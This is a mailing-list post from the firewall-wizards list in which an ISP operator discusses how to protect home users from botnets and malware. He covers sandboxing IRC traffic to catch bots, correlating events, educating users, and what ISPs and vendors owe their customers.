Re: The home user problem returns

[Mason Schmitt <mason () schmitt ca>]

Kevin wrote:
> > > We take this a step further -- let all traffic that hits the blocks talk
> > > to a "sandbox" minimal IRCd, and if the traffic looks like bot chatter,
> > > quarantine the source host.
>
> We just run a very basic IRCd, modified to generate a log event for
> each PRIVMSG, JOIN, NICK and other similar command issued by
> any client.  We can also look at the original destination IP they
> addressed, and check this against a list of known C&C channels.

That's a very cool approach.  I imagine that I could do that for all
outbound IRC traffic, by using a snort sig.  That would be easier for me
to maintain as it would be part of a more generic tool that I would
already have in place (don't have an IDS yet, but it's on my list for
sometime in the next few months).

> > I'm somewhat sceptical that some "live chat" buttons actually invoke IRC.
> > Or Invader Zim webboard for that matter ;)  Are you sure?  Can you give me
> > a real example?
>
>
> The first "real" user who complained had clicked through from JDate,
> and suddenly found himself chatting with 37 instances of SDBot...

I imagine that SDBot wouldn't make a very good date.

> As for Invader Zim, see http://www.badbadrubberpiggy.com/chat.php/

Man, I thought you made that up!

Well, now that you have pointed this out, that pushes me back a step.
Perhaps I should approach this in a similar manner to the way that
spammassassin tackles spam.  Rather than make black or white decisions
based upon a single bit of info, perhaps I should check for multiple
events and attempt to correlate them...  Ugh, that sounds like a lot of
work.  Maybe ossim can handle some of the event correlation for me.

Isn't that the idea behind sourcefire's 3d system?  Have multiple agents
and correlate data in real time in order to block threats?  I think that
multiple agent event correlation makes a ton of sense.  Is anyone doing
it well (that we could afford...)?

I know that somewhere Marcus is getting ready to unfurl his IPS rant
(/me braces himself).  Sorry Marcus, I honestly don't see how I can
avoid this kind of system.  I actually had customers that got angry when
I tried to block spam from getting to them!  They said that it was
theirs to block, not mine.  We've since moved to a subscription model
for spam protection.  A public ISP just cannot be run like a corporate
network, it's a totally different beast.  In fact, I know a lot of
techies that would argue that ISPs should be totally transparent.  In
this day and age, I consider that view to be selfish and irresponsible.
 If we had a full customer base of nothing but security conscious
computer geeks, then it wouldn't be an issue, but that's not the case.
This network if full of boomers and retirees, running version of windows
other than XP SP2, that are paying us for access to the net and some of
them get upset when we call them up because they have a virus.

Marcus and most of the rest of you, please keep preaching solid security
principles to businesses and governments, but when it comes to the home
user, you're wasting your breath.

As with any security endeavour, a multi faceted or "defence in depth"
solution is the best solution.  When it comes to the home user, this is
equally true.  Here are a few of the issues that I see and some of my
thoughts on the matter.

User education
----------------
User education still needs to happen, but this is going to be a very
slow ship to turn around, because right now, there is just too much
flashy crap distracting everyone.  Home users are getting digital
cameras and colour printers then trying to hook them up; they're getting
wireless devices and struggling with those; they've heard about free
music and movies and they want a piece of that and they want to burn
them to dvds; they want to have animated smiley faces in their email and
IM conversations; they want it to be dead easy for their cell phones to
do all sorts of things and on and on and on.  Those struggling with
their new wireless router have probably never heard of WEP or WPA, and
if they have, it's likely not enough to know that WEP, WEP+ and WPA are
all eminently crackable and that such a thing as war driving exists.
The average home user downloading music and movies may have heard that
it's illegal, but that they don't see how it can be, because everyone is
doing it.  They probably also don't know, that britney spears song they
just downloaded that didn't play was actually a trojan.  They are
probably unaware that the free p2p app they used came with 10 pieces of
spyware that will report all sorts of interesting things to people they
have never met.  What about going to a site that offers free smiley
faces?  That seems innocuous doesn't it?  Wrong again.  Now some IE bug
has just been exploited to install more spyware.

This is all far too much for your average home user to grasp let alone
keep up with the details.  I can't keep up with the details myself and I
love this stuff and do it all day everyday.  The root of the home user
problem is really rampant consumerism, but fighting that battle is not
one that's going to be won by computer security people.

I think that we should start by helping people to understand that the
Internet is not some *thing* that they connect to.  When they go online,
they become part of a very small world (literally - check out what small
world theory experiments have shown about the net) in which anyone
anywhere in the world, friendly or not, is able to reach their computer
in under a second.  This means that the bad parts of town (any town, all
towns, all countries) are now right on your doorstep, knocking at the
doors of your bank and favourite shopping haunts and even your
government repositories of whatever information they have on you.

However, I also don't think there is reason to panic.  Home users upon
hearing the preceding news, can be reassured that there are things that
they can do to protect themselves and it won't require them to learn
much about computers (a big fear for a lot of people).  They can be told
that if they do the 4 steps to basic security that they have just taken
a big chunk out of the problem (firewall, antivirus....).  And once you
have told them that, then you should either do it for them or have them
take it to a good tech.  They can be told that a computer is like a car,
it needs regular maintenance, by a PROFESSIONAL!  The current state of
computers and the security battle is too complicated for your average
home user and is getting beyond the capacity of most back yard mechanic
types too.  Beyond those basic steps, it gets more difficult.  Somehow
people need to learn to question.  They need to start thinking about
trust and in whom they place their trust and whether that trust is
warranted.  Think of p2p file sharing and clicking on links in IM from
people you have never met before.


Business and Government Education
-----------------------------------
Hopefully that's as far as home user ed needs to go right now.  Now we
have business and government education to deal with.  Both should be
approached in the same way that home users were approached above.  Start
with some basic measures.  Really, the same 4 measures apply, but just
on a larger more complicated scale and with many more possible
permutations of implementation.  In addition to the fab 4, business
needs to be more familiar with the fifth Beatle - BACKUPS.  As with the
home user, these basic defences start to take the edge off the problem.
 In order for business to not get stupid about how they implement these
4/5 basics, they should read Marcus' "Low Carb Security" article in
LOOP. Or think of the KISS principle. Or, if you admire Einstein think
of his quote, "Things should be made as simple as possible, but not any
simpler"

Business and government also face the same issues as the home user when
it comes to questioning and trust.  Think of the recent thread on this
list concerning CardSystems.


Caretakers
-------------
I don't believe in a dog eat dog world.  I think that those that have
the means need to take care of those that don't.

To that end, it is my opinion that ISPs need to provide some solid front
line defences for their customers while not being so restrictive, or
more importantly unwilling to really listen to their users, as to limit
innovation and expression.  ISPs have left their customers to the wolves
for too long and are now paying the price.

I also believe that the same applies to software houses.  I know that
everyone pokes at Microsoft, but they really are a prime example of a
company that has left their users out to dry for a long time.  They too
are now paying the price.  They also appear to be taking positive action
so perhaps they will redeem themselves... _somewhat_

In both these cases, greed and willing ignorance have played major roles
in getting us to where we are now.

The standards groups and all interested parties need to keep working
diligently on really basic protocol issues such as SMTP.

And again, we come back to trust.  Trust is poised to be a huge part of
the Internet infrastructure.  We need functional, ubiquitous healthy
trust systems so that home users can have some means of making the trust
decisions they are faced with and which they are now completely
incapable of addressing adequately.  Most of the trust issues that home
users face are not accessible to them anyway - again think of  CardSystems.


Law Makers / Enforcers
------------------------
I may not think the world is a dog eat dog world, but I'm also not
stupid enough to believe that there are not scads of people out there
willing to get what they want in any way they can.  This is where law
and law enforcement comes into the picture.  Because we are dealing with
a global communications network, our laws and policing methods need to
reflect that.

It's getting late and I'm running out of steam, so I'll leave this
stream of consciousness here, where it ground to a halt, and say good
night.  If any of you have had the patience to read this far, thanks for
reading.

--
Mason
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards